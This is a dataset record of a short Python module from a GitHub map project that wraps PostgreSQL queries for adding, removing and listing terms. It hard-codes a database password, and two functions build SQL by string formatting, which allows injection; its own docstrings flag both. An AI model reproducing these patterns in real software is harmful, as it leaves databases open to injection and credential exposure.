5dae8c6c5b57661e6f8489ae2ea063f21b02b2f5 | aaa444183b551ba649357cef8d0f141e9f46f1e6 | /app/model.py | 7b6194770899050a3ee432b9362042af23a7612e | [] | no_license | vshevch/MapPoject | a8e3528cbbf3467d28af79b3d6610e892221a6fd | 0356de78b644f93943b374a9cd019c128b087bfb | refs/heads/master | 2020-04-04T17:31:46.565111 | 2018-12-14T03:08:11 | 2018-12-14T03:08:11 | 156,124,375 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 654 | py | import psycopg2
import queries
# Not sure how to use getDB
def getDB():
    '''Open a new connection to the map_project database and return a cursor.

    The connection runs in autocommit mode, so every statement executed
    through the returned cursor is committed immediately.

    WARNING(security): credentials are hard-coded here; they should be
    moved to environment variables or a config file before deployment.
    '''
    connection = psycopg2.connect(
        host="localhost",
        database="map_project",
        user="vladshev",
        password="root",
    )
    connection.autocommit = True
    return connection.cursor()
def addTerm(t):
    '''Insert term *t* using the ``queries.addTerm`` SQL template.

    WARNING(security): ``queries.addTerm.format(t)`` builds SQL by string
    interpolation. If *t* can come from user input this is injectable;
    switch to a parameterized query (``cursor.execute(sql, (t,))``).

    NOTE(review): psycopg2's ``cursor.execute()`` returns None, so the
    returned value is always None; callers should not rely on it.
    '''
    db = getDB()
    result = db.execute(queries.addTerm.format(t))
    return result
def removeTerm(t):
    '''Delete term *t* using the ``queries.removeTerm`` SQL template.

    WARNING(security): ``queries.removeTerm.format(t)`` builds SQL by
    string interpolation and is injectable if *t* is user-controlled;
    prefer a parameterized query (``cursor.execute(sql, (t,))``).

    NOTE(review): psycopg2's ``cursor.execute()`` returns None, so the
    returned value is always None; callers should not rely on it.
    '''
    db = getDB()
    result = db.execute(queries.removeTerm.format(t))
    return result
def allTerms():
    '''Run the ``queries.getAll`` statement and return every row.'''
    cursor = getDB()
    cursor.execute(queries.getAll)
    return cursor.fetchall()
def allMap():
    '''Run the ``queries.getMap`` statement and return every row.'''
    cursor = getDB()
    cursor.execute(queries.getMap)
    return cursor.fetchall()
| [
"noreply@github.com"
] | vshevch.noreply@github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.